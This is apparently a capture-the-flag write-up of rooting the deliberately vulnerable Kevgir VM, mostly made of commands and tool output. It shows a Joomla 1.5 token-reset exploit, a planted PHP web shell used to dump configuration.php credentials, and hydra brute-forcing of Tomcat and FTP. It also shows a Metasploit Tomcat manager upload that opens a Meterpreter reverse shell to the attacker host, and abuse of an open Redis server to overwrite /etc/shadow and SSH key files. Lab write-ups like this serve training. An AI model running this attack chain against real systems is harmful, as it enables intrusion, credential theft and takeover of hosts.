Kevgir VM WriteUp

https://canyoupwn.me/kevgir-vulnerable-vm/ - Kevgir VM download

1) jenkins
2) joomla
3) bruteforce (ftp,tomcat)
4) tomcat
5) redis

nmap -p- -T4 -sS -O 10.0.1.3

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-17 11:34 CET
Nmap scan report for 10.0.1.3
Host is up (0.0012s latency).
Not shown: 65517 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1322/tcp open novation
2049/tcp open nfs
6379/tcp open unknown
8080/tcp open http-proxy
8081/tcp open blackice-icecap
9000/tcp open cslistener
32938/tcp open unknown
41511/tcp open unknown
42149/tcp open unknown
46990/tcp open unknown
48201/tcp open unknown
52526/tcp open unknown
59559/tcp open unknown
MAC Address: 08:00:27:F8:A1:F5 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.68 seconds

1)
http://10.0.1.3:8081/

http://10.0.1.3:8081/index2.php <= <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> - index2.php discovered via dirbuster

I used exploit - (Token) Remote Admin Change Password Vulnerability
https://www.exploit-db.com/exploits/6234/

10.0.1.3:8081/index.php?option=com_user&view=reset&layout=confirm
1) Write into field "token" char ' and Click OK.
2) Write new password for admin
3) 10.0.1.3:8081/administrator
4) Login admin:new_pass

i have access to admin panel - http://10.0.1.3:8081/administrator/index.php

After install new extension directphp because I want to add my PHP code to article.

<?php system($_GET[i]);?>

http://10.0.1.3:8081/?i=cat%20configuration.php

lease check back again soon.'; var $sitename = 'CanYou PwnMe'; var $editor = 'tinymce'; var $list_limit = '20'; var $legacy = '0'; /* Debug Settings */ var $debug = '0'; var $debug_lang = '0'; /* Database Settings */ var $dbtype = 'mysql'; var $host = 'localhost'; var $user = 'joomlauser'; var $password = '1m4dm1n!'; var $db = 'joomla'; var $dbprefix = 'jos_'; /* Server Settings */ var $live_site = ''; var $secret = 'phn4U0DCRrlLzM5M'; var $gzip = '0'; var $error_reporting = '-1'; var $helpurl = 'http://help.joomla.org'; var $xmlrpc_server = '0'; var $ftp_host = '127.0.0.1'; var $ftp_port = '21'; var $ftp_user = ''; var $ftp_pass = ''; var $ftp_root = ''; var $ftp_enable = '0'; /* Locale Settings */ var $offset = '0'; var $offset_user = '0'; /* Mail Settings */ var $mailer = 'mail'; var $mailfrom = ' admin@joomla.org'; var $fromname = 'CanYou PwnMe'; var $sendmail = '/usr/sbin/sendmail'; var $smtpauth = '0'; var $smtpuser = ''; var $smtppass = ''; var $smtphost = 'localhost'; /* Cache Settings */ var $caching = '0'; var $cachetime = '15'; var $cache_handler = 'file'; /* Meta Settings */ var $MetaDesc = 'Joomla! - the dynamic portal engine and content management system'; var $MetaKeys = 'joomla, Joomla'; var $MetaTitle = '1'; var $MetaAuthor = '1'; /* SEO Settings */ var $sef = '0'; var $sef_rewrite = '0'; var $sef_suffix = '0'; /* Feed Settings */ var $feed_limit = 10; var $log_path = '/var/www/html/gentleman/logs'; var $tmp_path = '/var/www/html/gentleman/tmp'; /* Session Setting */ var $lifetime = '15'; var $session_handler = 'database'; } ?>

2) Cracking tomcat manager
hydra -l tomcat -P /usr/share/wordlists/rockyou.txt -e ns -s 8080 -vV 10.0.1.3 http-get /manager/html

[8080][http-get] host: 10.0.1.3 login: tomcat password: tomcat

next used metasploit:
Module options (exploit/multi/http/tomcat_mgr_upload):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD tomcat no The password for the specified username
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.0.1.3 yes The target address
RPORT 8080 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used)
USERNAME tomcat no The username to authenticate as
VHOST no HTTP server virtual host

Payload options (java/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.1.2 yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Java Universal

msf exploit(tomcat_mgr_upload) > exploit

[*] Started reverse TCP handler on 10.0.1.2:4444
[*] 10.0.1.3:8080 - Retrieving session ID and CSRF token...
[*] 10.0.1.3:8080 - Uploading and deploying ltKnITWSrBQ5ioDn...
[*] 10.0.1.3:8080 - Executing ltKnITWSrBQ5ioDn...
[*] 10.0.1.3:8080 - Undeploying ltKnITWSrBQ5ioDn ...
[*] Sending stage (46089 bytes) to 10.0.1.3
[*] Meterpreter session 2 opened (10.0.1.2:4444 -> 10.0.1.3:39544) at 2016-03-16 10:46:20 +0100

meterpreter >

meterpreter > shell
Process 1 created.
Channel 1 created.

ls
common
conf
logs
server
shared
webapps
work
uname -a
Linux canyoupwnme 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux

3) crack password FTP
hydra -l admin -P /usr/share/wordlists/rockyou.txt -u -e s -s 25 10.0.1.3 ftp
[25][ftp] host: 10.0.1.3 login: admin password: admin

4) redis hacking
root@kali:~# redis-cli -h 10.0.1.3
10.0.1.3:6379> INFO
# Server
redis_version:3.0.7
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:aa70bcb321ba8313
redis_mode:standalone
os:Linux 3.19.0-25-generic i686
arch_bits:32
multiplexing_api:epoll
gcc_version:4.8.4
process_id:1215
run_id:f77a1654a20f1a67cadbe83761f0bd907ce01e0e
tcp_port:6379
uptime_in_seconds:4070
uptime_in_days:0
hz:10
lru_clock:15370196
config_file:/etc/redis/6379.conf

# Clients
connected_clients:2
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0

# Memory
used_memory:659136
used_memory_human:643.69K
used_memory_rss:9306112
used_memory_peak:687064
used_memory_peak_human:670.96K
used_memory_lua:24576
mem_fragmentation_ratio:14.12
mem_allocator:jemalloc-3.6.0

# Persistence
loading:0
rdb_changes_since_last_save:1
rdb_bgsave_in_progress:0
rdb_last_save_time:1458210485
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:0
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok

# Stats
total_connections_received:21
total_commands_processed:74
instantaneous_ops_per_sec:0
total_net_input_bytes:6574
total_net_output_bytes:22122
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:14331
migrate_cached_sockets:0

# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:34.07
used_cpu_user:0.28
used_cpu_sys_children:0.02
used_cpu_user_children:0.00

# Cluster
cluster_enabled:0

# Keyspace
db0:keys=2,expires=0,avg_ttl=0
10.0.1.3:6379>

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt/.ssh"

Module options (auxiliary/scanner/redis/file_upload):

Name Current Setting Required Description
---- --------------- -------- -----------
DISABLE_RDBCOMPRESSION true yes Disable compression when saving if found to be enabled
LocalFile no Local file to be uploaded
Password foobared no Redis password for authentication test
RHOSTS yes The target address range or CIDR identifier
RPORT 6379 yes The target port
RemoteFile no Remote file path
THREADS 1 yes The number of concurrent threads

msf auxiliary(file_upload) > set RHOSTS 10.0.1.3
RHOSTS => 10.0.1.3
msf auxiliary(file_upload) > exploit

[-] Auxiliary failed: RuntimeError bad-config: LocalFile must be set
[-] Call stack:
[-] /usr/share/metasploit-framework/lib/msf/core/module.rb:291:in `fail_with'
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/redis/file_upload.rb:150:in `run_host'
[-] /usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:121:in `block (2 levels) in run'
[-] /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
[*] Auxiliary module execution completed
msf auxiliary(file_upload) > set LocalFile /root/.ssh/foo.txt
LocalFile => /root/.ssh/foo.txt
msf auxiliary(file_upload) > set RemoteFile /root/.ssh/authorized_keys
RemoteFile => /root/.ssh/authorized_keys
msf auxiliary(file_upload) > exploit

[-] 10.0.1.3:6379 - 10.0.1.3:6379 -- failed to save 392 bytes to /root/.ssh/authorized_keys (permissions?)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(file_upload) > set RemoteFile /root/.ssh/id_rsa
RemoteFile => /root/.ssh/id_rsa
msf auxiliary(file_upload) > exploit

[+] 10.0.1.3:6379 - 10.0.1.3:6379 -- saved 392 bytes inside of redis DB at /root/.ssh/id_rsa
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(file_upload) > set RemoteFile /etc/shadow
RemoteFile => /etc/shadow
msf auxiliary(file_upload) > exploit

[+] 10.0.1.3:6379 - 10.0.1.3:6379 -- saved 392 bytes inside of redis DB at /etc/shadow
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(file_upload) > set LocalFile /etc/shadow
LocalFile => /etc/shadow
msf auxiliary(file_upload) > set RemoteFile /etc/shadow
RemoteFile => /etc/shadow
msf auxiliary(file_upload) > exploit

[+] 10.0.1.3:6379 - 10.0.1.3:6379 -- saved 1664 bytes inside of redis DB at /etc/shadow
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(file_upload) >

DONE
i logged in to VM on root.

w4cky - BST

czwartek, 17 marca 2016